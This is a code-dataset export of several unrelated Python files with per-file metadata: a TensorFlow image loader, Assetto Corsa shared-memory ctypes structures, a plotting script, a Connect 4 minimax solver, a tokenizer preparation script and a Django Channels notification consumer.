# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import tensorflow_probability as tfp
import tensorflow_datasets as tfds
import bit_hyperrule
# A workaround to avoid crash because tfds may open too many files.
import resource
low, high = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (high, high))
# Adjust depending on the available RAM.
MAX_IN_MEMORY = 200_000
# vim /home/yiran.wu/.local/lib/python3.7/site-packages/tensorflow_datasets/core/dataset_info.py :
# added in line 449 : return
def get_data(dataset, train_split):
resize_size, crop_size = bit_hyperrule.get_resolution_from_dataset(dataset)
# build from folder
data_builder = tfds.folder_dataset.ImageFolder(dataset)
# get numbers
num_classes = data_builder.info.features['label'].num_classes
num_train = data_builder.info.splits['train'].num_examples
num_test = data_builder.info.splits['test'].num_examples
num_valid = data_builder.info.splits['val'].num_examples
# to dataset
train_data = data_builder.as_dataset(split='train', decoders={'image': tfds.decode.SkipDecoding()})
test_data = data_builder.as_dataset(split='test', decoders={'image' : tfds.decode.SkipDecoding()})
valid_data = data_builder.as_dataset(split='val', decoders={'image' : tfds.decode.SkipDecoding()})
decoder = data_builder.info.features['image'].decode_example
mixup_alpha=bit_hyperrule.get_mixup(num_train)
# get returns
train_data = data_aug(data=train_data,
mode='train',
num_examples=num_train,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
valid_data = data_aug(data=valid_data,
mode='valid',
num_examples=num_valid,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
test_data = data_aug(data=test_data,
mode='test',
num_examples=num_test,
decoder=decoder,
num_classes=num_classes,
resize_size=resize_size,
crop_size=crop_size,
mixup_alpha=mixup_alpha)
return train_data, valid_data, test_data, num_train, num_classes
# shadow function of get_data
def data_aug(data,
mode,
num_examples,
decoder,
num_classes,
resize_size,
crop_size,
mixup_alpha):
def _pp(data):
im = decoder(data['image'])
if mode == 'eee':
im = tf.image.resize(im, [resize_size, resize_size])
im = tf.image.random_crop(im, [crop_size, crop_size, 3])
im = tf.image.flip_left_right(im)
else:
# usage of crop_size here is intentional
im = tf.image.resize(im, [crop_size, crop_size])
im = (im - 127.5) / 127.5
label = tf.one_hot(data['label'], num_classes)
return {'image': im, 'label': label}
def _mixup(data):
beta_dist = tfp.distributions.Beta(mixup_alpha, mixup_alpha)
beta = tf.cast(beta_dist.sample([]), tf.float32)
data['image'] = (beta * data['image'] +
(1 - beta) * tf.reverse(data['image'], axis=[0]))
data['label'] = (beta * data['label'] +
(1 - beta) * tf.reverse(data['label'], axis=[0]))
return data
def reshape_for_keras(features, crop_size):
features["image"] = tf.reshape(features["image"], (1, crop_size, crop_size, 3))
features["label"] = tf.reshape(features["label"], (1, -1))
return (features["image"], features["label"])
data = data.cache()
if mode == 'train':
data = data.repeat(None).shuffle(min(num_examples, MAX_IN_MEMORY))
data = data.map(_pp, tf.data.experimental.AUTOTUNE)
data = data.batch(1)
# if mixup_alpha is not None and mixup_alpha > 0.0 and mode == 'train':
# data = data.map(_mixup, tf.data.experimental.AUTOTUNE)
data = data.map(lambda x: reshape_for_keras(x, crop_size=crop_size))
return data
| 38.162963
| 103
| 0.606366
| 635
| 5,152
| 4.711811
| 0.297638
| 0.048128
| 0.048128
| 0.037433
| 0.225267
| 0.142045
| 0.090241
| 0.090241
| 0.090241
| 0.090241
| 0
| 0.011242
| 0.29212
| 5,152
| 134
| 104
| 38.447761
| 0.809158
| 0.209627
| 0
| 0.204819
| 0
| 0
| 0.03733
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060241
| false
| 0
| 0.060241
| 0
| 0.180723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4c824ddba4f2d18052e43c4be91b69f16e79d
| 5,997
|
py
|
Python
|
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | 3
|
2022-01-18T01:11:21.000Z
|
2022-01-25T01:04:42.000Z
|
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | null | null | null |
accrpc/maps.py
|
manucabral/accrpc
|
8b8f3d47751732706570fded73cdc64bf1edb41d
|
[
"MIT"
] | null | null | null |
from ctypes import Structure, sizeof, c_int, c_int32, c_float, c_wchar
# Credits
# https://github.com/dabde/acc_shared_mem_access_python
# https://github.com/rrennoir/PyAccSharedMemory
class Statics(Structure):
_fields_ = [
("smVersion", c_wchar * 15),
("acVersion", c_wchar * 15),
("numberOfSessions", c_int),
("numCars", c_int),
("carModel", c_wchar * 33),
("track", c_wchar * 33),
("playerName", c_wchar * 33),
("playerSurname", c_wchar * 33),
("playerNick", c_wchar * 33),
("sectorCount", c_int),
("maxTorque", c_float),
("maxPower", c_float),
("maxRpm", c_int),
("maxFuel", c_float),
("suspensionMaxTravel", c_float * 4),
("tyreRadius", c_float * 4),
("maxTurboBoost", c_float * 4),
("deprecated_1", c_float),
("deprecated_2", c_float),
("penaltiesEnabled", c_int),
("aidFuelRate", c_float),
("aidTireRate", c_float),
("aidMechanicalDamage", c_float),
("aidAllowTyreBlankets", c_int),
("aidStability", c_float),
("aidAutoClutch", c_int),
("aidAutoBlip", c_int),
("hasDRS", c_int),
("hasERS", c_int),
("hasKERS", c_int),
("kersMaxJ", c_float),
("engineBrakeSettingsCount", c_int),
("ersPowerControllerCount", c_int),
("trackSPlineLength", c_float),
("trackConfiguration", c_wchar * 33),
("ersMaxJ", c_float),
("isTimedRace", c_int),
("hasExtraLap", c_int),
("carSkin", c_wchar * 33),
("reversedGridPositions", c_int),
("PitWindowStart", c_int),
("PitWindowEnd", c_int),
("isOnline", c_int),
]
class Physics(Structure):
_fields_ = [
("packetId", c_int),
("gas", c_float),
("brake", c_float),
("fuel", c_float),
("gear", c_int),
("rpms", c_int),
("steerAngle", c_float),
("speedKmh", c_float),
("velocity", c_float * 3),
("accG", c_float * 3),
("wheelSlip", c_float * 4),
("wheelLoad", c_float * 4),
("wheelsPressure", c_float * 4),
("wheelAngularSpeed", c_float * 4),
("tyreWear", c_float * 4),
("tyreDirtyLevel", c_float * 4),
("tyreCoreTemperature", c_float * 4),
("camberRAD", c_float * 4),
("suspensionTravel", c_float * 4),
("drs", c_float),
("tc", c_float),
("heading", c_float),
("pitch", c_float),
("roll", c_float),
("cgHeight", c_float),
("carDamage", c_float * 5),
("numberOfTyresOut", c_int),
("pitLimiterOn", c_int),
("abs", c_float),
("kersCharge", c_float),
("kersInput", c_float),
("autoShifterOn", c_int),
("rideHeight", c_float * 2),
("turboBoost", c_float),
("ballast", c_float),
("airDensity", c_float),
("airTemp", c_float),
("roadTemp", c_float),
("localAngularVel", c_float * 3),
("finalFF", c_float),
("performanceMeter", c_float),
("engineBrake", c_int),
("ersRecoveryLevel", c_int),
("ersPowerLevel", c_int),
("ersHeatCharging", c_int),
("ersIsCharging", c_int),
("kersCurrentKJ", c_float),
("drsAvailable", c_int),
("drsEnabled", c_int),
("brakeTemp", c_float * 4),
("clutch", c_float),
("tyreTempI", c_float * 4),
("tyreTempM", c_float * 4),
("tyreTempO", c_float * 4),
("isAIControlled", c_int),
("tyreContactPoint", c_float * 4 * 3),
("tyreContactNormal", c_float * 4 * 3),
("tyreContactHeading", c_float * 4 * 3),
("brakeBias", c_float),
("localVelocity", c_float * 3),
("P2PActivations", c_int),
("P2PStatus", c_int),
("currentMaxRpm", c_int),
("mz", c_float * 4),
("fx", c_float * 4),
("fy", c_float * 4),
("slipRatio", c_float * 4),
("slipAngle", c_float * 4),
("tcinAction", c_int),
("absInAction", c_int),
("suspensionDamage", c_float * 4),
("tyreTemp", c_float * 4),
]
class Graphics(Structure):
_fields_ = [
("packetId", c_int),
("AC_STATUS", c_int),
("AC_SESSION_TYPE", c_int),
("currentTime", c_wchar * 15),
("lastTime", c_wchar * 15),
("bestTime", c_wchar * 15),
("split", c_wchar * 15),
("completedLaps", c_int),
("position", c_int),
("iCurrentTime", c_int),
("iLastTime", c_int),
("iBestTime", c_int),
("sessionTimeLeft", c_float),
("distanceTraveled", c_float),
("isInPit", c_int),
("currentSectorIndex", c_int),
("lastSectorTime", c_int),
("numberOfLaps", c_int),
("tyreCompound", c_wchar * 33),
("replayTimeMultiplier", c_float),
("normalizedCarPosition", c_float),
("activeCars", c_int),
("carCoordinates", c_float * 60 * 3),
("carID", c_int * 60),
("playerCarID", c_int),
("penaltyTime", c_float),
("flag", c_int),
("penalty", c_int),
("idealLineOn", c_int),
("isInPitLane", c_int),
("surfaceGrip", c_float),
("mandatoryPitDone", c_int),
("windSpeed", c_float),
("windDirection", c_float),
("isSetupMenuVisible", c_int),
("mainDisplayIndex", c_int),
("secondaryDisplayIndex", c_int),
("TC", c_int),
("TCCut", c_int),
("EngineMap", c_int),
("ABS", c_int),
("fuelXLap", c_int),
("rainLights", c_int),
("flashingLights", c_int),
("lightsStage", c_int),
("exhaustTemperature", c_float),
("wiperLV", c_int),
("DriverStintTotalTimeLeft", c_int),
("DriverStintTimeLeft", c_int),
("rainTypes", c_int),
]
| 32.416216
| 70
| 0.516925
| 592
| 5,997
| 4.925676
| 0.334459
| 0.162551
| 0.062414
| 0.00823
| 0.018519
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017703
| 0.302985
| 5,997
| 184
| 71
| 32.592391
| 0.679904
| 0.017842
| 0
| 0.028571
| 0
| 0
| 0.303262
| 0.022766
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005714
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4c9c1dbb3216905a27aa4ce2edea78394a9e2
| 2,554
|
py
|
Python
|
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import script_util as su
import pandas as pd
import numpy as np
import argparse
def get_score(tsv_file, pA, pB, score_name):
df = pd.read_csv(tsv_file, sep="\t")
df.set_index(["pA", "pB"], inplace=True)
return float(df.loc[(pA, pB), score_name])
def get_N(tsv_file, pA, pB):
df = pd.read_csv(tsv_file, sep="\t")
df.set_index(["pA", "pB"], inplace=True)
return int(df.loc[(pA, pB), "pat"])
def collect_scores(tsv_files, pA, pB, score_name):
path_info = [su.parse_path(tsv) for tsv in tsv_files]
fcs = [pi["fc"] for pi in path_info]
bcs = [pi["bc"] for pi in path_info]
scores = [get_score(tsv, pA, pB, score_name) for tsv in tsv_files]
fc_ls = sorted(list(set(fcs)))
bc_ls = sorted(list(set(bcs)))
fc_to_idx = {str(fc): i for i, fc in enumerate(fc_ls)}
bc_to_idx = {str(bc): i for i, bc in enumerate(bc_ls)}
score_mat = np.empty((len(fc_ls), len(bc_ls)))
score_mat[:,:] = np.nan
for fc, bc, score in zip(fcs, bcs, scores):
score_mat[fc_to_idx[str(fc)], bc_to_idx[str(bc)]] = score
return fc_ls, bc_ls, score_mat
def plot_scores(fc_ls, bc_ls, score_mat):
#plt.imshow(score_mat, vmin=0.0, vmax=1.0, origin="lower", cmap="binary")
plt.imshow(np.transpose(score_mat), origin="lower", cmap="binary")
plt.xticks(range(len(fc_ls)), fc_ls)
plt.yticks(range(len(bc_ls)), bc_ls)
plt.xlabel(su.NICE_NAMES["fc"])
plt.ylabel(su.NICE_NAMES["bc"])
return
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("design")
parser.add_argument("pA", type=float)
parser.add_argument("pB", type=float)
parser.add_argument("score_name")
parser.add_argument("out_png")
parser.add_argument("--score_tsvs", nargs="+")
args = parser.parse_args()
fc, bc, scores = collect_scores(args.score_tsvs,
args.pA, args.pB,
args.score_name)
N = get_N(args.score_tsvs[0], args.pA, args.pB)
plot_scores(fc, bc, scores)
plt.colorbar()
plt.title("{}\n{}; {}={}; {}={}, {}={}".format(su.NICE_NAMES[args.score_name],
su.NICE_NAMES[args.design],
su.NICE_NAMES["pat"], N,
su.NICE_NAMES["pA"], args.pA,
su.NICE_NAMES["pB"], args.pB)
)
plt.tight_layout()
plt.savefig(args.out_png)
| 27.462366
| 82
| 0.583399
| 388
| 2,554
| 3.613402
| 0.255155
| 0.022825
| 0.054922
| 0.03709
| 0.268188
| 0.098431
| 0.075606
| 0.075606
| 0.075606
| 0.075606
| 0
| 0.002644
| 0.259593
| 2,554
| 92
| 83
| 27.76087
| 0.738763
| 0.028191
| 0
| 0.070175
| 0
| 0
| 0.046774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.087719
| 0
| 0.22807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b5bab4def1ed3509dd85a680dfad03dc1b2fa0
| 5,466
|
py
|
Python
|
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
"""
Minimax algorithm with alpha-beta pruning applied to the Connect 4 game.
Inspired by https://youtu.be/l-hh51ncgDI
"""
import os
import copy
import math
def minimax(game, depth, maximize, alpha=None, beta=None):
"""Minimax algorithm, using (optionally) alpha-beta pruning."""
if depth == 0:
# Maximum depth reached: evaluate current position
return evaluate(game), game, 1, alpha, beta
color = get_player_color(maximize)
# Init best score with worst possible value
# -∞ if maximizing, +∞ if minimizing
best_score = -math.inf if maximize else math.inf
best_position = []
total_evaluated_positions = 0
for position in next_valid_positions(game, color):
# Recursive minimax call for next positions of current player
score, _, num_evaluated_positions, _, _ = minimax(
position, depth - 1, not maximize, alpha, beta
)
total_evaluated_positions += num_evaluated_positions
# Store evaluation and best possible position
# (the one which improves score if maximizing, or diminish score if minimizing)
if (maximize and score > best_score) or (not maximize and score < best_score):
best_score = score
best_position = position
if alpha is not None and beta is not None:
# Alpha-beta pruning
# alpha is the minimum guaranteed score for the maximizing player
# beta is the maximum guaranteed score for the minimizing player
if maximize:
alpha = max(alpha, best_score)
else:
beta = min(beta, best_score)
if beta < alpha:
# Further positions cannot improve score: skip them
break
return best_score, best_position, total_evaluated_positions, alpha, beta
def get_player_color(maximize):
"""Return the color (R or Y) for a player.
The maximizing player plays red, the minimizing player plays yellow.
"""
return "R" if maximize else "Y"
def compute_disc_row(game, y):
"""Compute at which row a disc will fall when played in a column."""
x = -1
while x < len(game) - 1 and game[x + 1][y] == " ":
x += 1
return x
def next_valid_positions(game, color):
"""Return a list of all next valid positions for playing a color."""
positions = []
for y in range(len(game[0])):
x = compute_disc_row(game, y)
if x != -1: # A play is possible in column y
# Clone game (which is a list of lists, hence the need for deep copy)
# to obtain a new, independant list
# https://stackoverflow.com/a/28684234
nouveau_game = copy.deepcopy(game)
nouveau_game[x][y] = color
positions.append(nouveau_game)
return positions
def evaluate(game):
"""Evaluate a game position.
Evaluation method is as follows:
- a winning position is either +100 (for red) or -100 (for yellow).
- otherwise, the number of red triplets (aligned red discs)
is substracted from the number of yellow triplets.
"""
if count_alignments(game, "R", 4) == 1:
return 100
if count_alignments(game, "Y", 4) == 1:
return -100
red_triplets = count_alignments(game, "R", 3)
yellow_triplets = count_alignments(game, "Y", 3)
return red_triplets - yellow_triplets
def count_alignments(game, color, target_number):
"""Count the number of alignments of target_number discs for a color."""
alignments = 0
# Horizontal alignments
for x, _ in enumerate(game):
for y in range(len(game[x]) - target_number + 1):
if game[x][y : y + target_number] == [color] * target_number:
# print(f"Horizontal alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
# Vertical alignments
for x in range(len(game) - target_number + 1):
for y in range(len(game[x])):
# game[x : x + target_number] returns a list of lists
# We retrieve the yth element of each one: a vertical line
if [ligne[y] for ligne in game[x : x + target_number]] == [
color
] * target_number:
# print(f"Vertical alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
# Diagonal alignments
for x, _ in enumerate(game):
for y in range(len(game[x]) - target_number + 1):
# game[x : x + target_number] returns a list of lists
# We retrieve the (y+i)th element of each one: a diagonal line
if [
ligne[y + i] for i, ligne in enumerate(game[x : x + target_number])
] == [color] * target_number:
# print(f"Diagonal alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
return alignments
def init_game(n_rows, n_columns, red_discs, yellow_discs):
"""Init an empty game with some initial moves.
Game is a 2D grid indexed from top left (0,0) to bottom right.
"""
game = [[" " for _ in range(n_columns)] for _ in range(n_rows)]
for x, y in red_discs:
game[x][y] = "R"
for x, y in yellow_discs:
game[x][y] = "Y"
return game
def to_string(game):
"""Return a string representation of a game position."""
return os.linesep.join([" | ".join([f"{disc}" for disc in row]) for row in game])
| 32.730539
| 89
| 0.612697
| 747
| 5,466
| 4.382865
| 0.231593
| 0.058644
| 0.023824
| 0.021381
| 0.229383
| 0.154246
| 0.148748
| 0.132254
| 0.132254
| 0.132254
| 0
| 0.012652
| 0.291438
| 5,466
| 166
| 90
| 32.927711
| 0.832171
| 0.374131
| 0
| 0.089744
| 0
| 0
| 0.005738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102564
| false
| 0
| 0.038462
| 0
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b832c7207c148b4f89c1e17e84f452793c1e36
| 3,397
|
py
|
Python
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 42
|
2020-12-11T09:21:10.000Z
|
2022-02-20T01:44:32.000Z
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 2
|
2020-12-15T14:40:33.000Z
|
2021-08-02T07:04:42.000Z
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 5
|
2020-12-13T16:03:03.000Z
|
2021-08-09T14:18:37.000Z
|
from argparse import ArgumentParser
from pathlib import Path
import pickle
import os
from tqdm import tqdm
from tokenizers import Tokenizer
from tokenizers.processors import RobertaProcessing
from transformers import AutoTokenizer
def init_tokenizer(lang, n, m):
if n is None and m is None:
print('size nor model are specified, but one of them is required')
exit(1)
if m is not None:
tokenizer = AutoTokenizer.from_pretrained(m, use_fast=True)
return tokenizer
tokenizer = Tokenizer.from_file(
str(
Path('data') / lang / 'preparation' / 'vocabularies' /
f'{lang}-{str(n).zfill(3)}k.tokenizer.json'))
tokenizer.post_processor = RobertaProcessing(
('</s>', tokenizer.token_to_id('</s>')),
('<s>', tokenizer.token_to_id('<s>')),
trim_offsets=True)
return tokenizer
def tokenize_doc(tokenizer: Tokenizer, doc):
enc = tokenizer.encode(doc)
if type(enc) == list:
return enc
return enc.ids
def tokenize_file(tokenizer, src_path, eot=None):
examples = []
doc = ''
with open(src_path) as f:
for line in tqdm(f):
if eot is None and line == '\n':
examples.append(tokenize_doc(tokenizer, doc))
doc = ''
continue
elif eot is not None and line == eot + '\n':
examples.append(tokenize_doc(tokenizer, doc.strip()))
doc = ''
continue
doc += line
if doc != '':
examples.append(tokenize_doc(tokenizer, doc))
return examples
def main():
parser = ArgumentParser()
parser.add_argument('lang')
parser.add_argument('--size',
type=int,
default=None,
help='vocab size (in thousands)')
parser.add_argument('--model',
default=None,
help='HuggingFace model identifier')
parser.add_argument('--eot', default=None)
args = parser.parse_args()
prep_dir = Path('data') / args.lang / 'preparation' / 'prepared'
dst_path = prep_dir / ('data.pkl' if args.size is None else
f'data-{str(args.size).zfill(3)}k.pkl')
if not dst_path.parent.exists():
os.makedirs(dst_path.parent)
print(f' > preparing {dst_path}')
tokenizer = init_tokenizer(args.lang, args.size, args.model)
examples = []
src_paths = sorted((Path('data') / args.lang / 'preparation' /
'plaintext').glob('**/*.txt'))
for src_path in src_paths:
print('🔥', src_path)
new_examples = tokenize_file(tokenizer, src_path, eot=args.eot)
if src_path.name in ['train.txt', 'valid.txt', 'test.txt']:
subset = src_path.name.split('.')[0]
out_path = dst_path.parent / dst_path.name.replace(
'data', f'data-{subset}')
print(f' > exporting {len(new_examples):,} examples to {out_path}')
with open(out_path, 'wb') as f:
pickle.dump(new_examples, f)
examples.extend(new_examples)
print(f' ::: {len(examples):,} examples loaded')
print(f'{len(examples):,} examples')
print(f' > exporting {dst_path}')
with open(dst_path, 'wb') as f:
pickle.dump(examples, f)
if __name__ == '__main__':
main()
| 30.603604
| 79
| 0.578746
| 411
| 3,397
| 4.649635
| 0.306569
| 0.029304
| 0.041863
| 0.039246
| 0.186813
| 0.132391
| 0.03977
| 0
| 0
| 0
| 0
| 0.001664
| 0.292317
| 3,397
| 110
| 80
| 30.881818
| 0.792845
| 0
| 0
| 0.151163
| 0
| 0
| 0.158669
| 0.02826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.093023
| 0
| 0.197674
| 0.081395
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b8963f6516bffc7a6999cc9be33b3103b93631
| 1,175
|
py
|
Python
|
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | 7
|
2021-03-19T10:46:09.000Z
|
2022-03-12T00:28:55.000Z
|
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
from channels.generic.websocket import WebsocketConsumer
import json
from asgiref.sync import async_to_sync
class NotificationConsumer(WebsocketConsumer):
# Function to connect to the websocket
def connect(self):
# Checking if the User is logged in
if self.scope["user"].is_anonymous:
# Reject the connection
self.close()
else:
# print(self.scope["user"]) # Can access logged in user details by using self.scope.user, Can only be used if AuthMiddlewareStack is used in the routing.py
self.group_name = str(self.scope["user"].pk) # Setting the group name as the pk of the user primary key as it is unique to each user. The group name is used to communicate with the user.
async_to_sync(self.channel_layer.group_add)(self.group_name, self.channel_name)
self.accept()
# Function to disconnet the Socket
def disconnect(self, close_code):
self.close()
# pass
# Custom Notify Function which can be called from Views or api to send message to the frontend
def notify(self, event):
self.send(text_data=json.dumps(event["text"]))
| 43.518519
| 199
| 0.685106
| 168
| 1,175
| 4.720238
| 0.470238
| 0.045397
| 0.065574
| 0.040353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241702
| 1,175
| 27
| 200
| 43.518519
| 0.890011
| 0.440851
| 0
| 0.133333
| 0
| 0
| 0.018519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|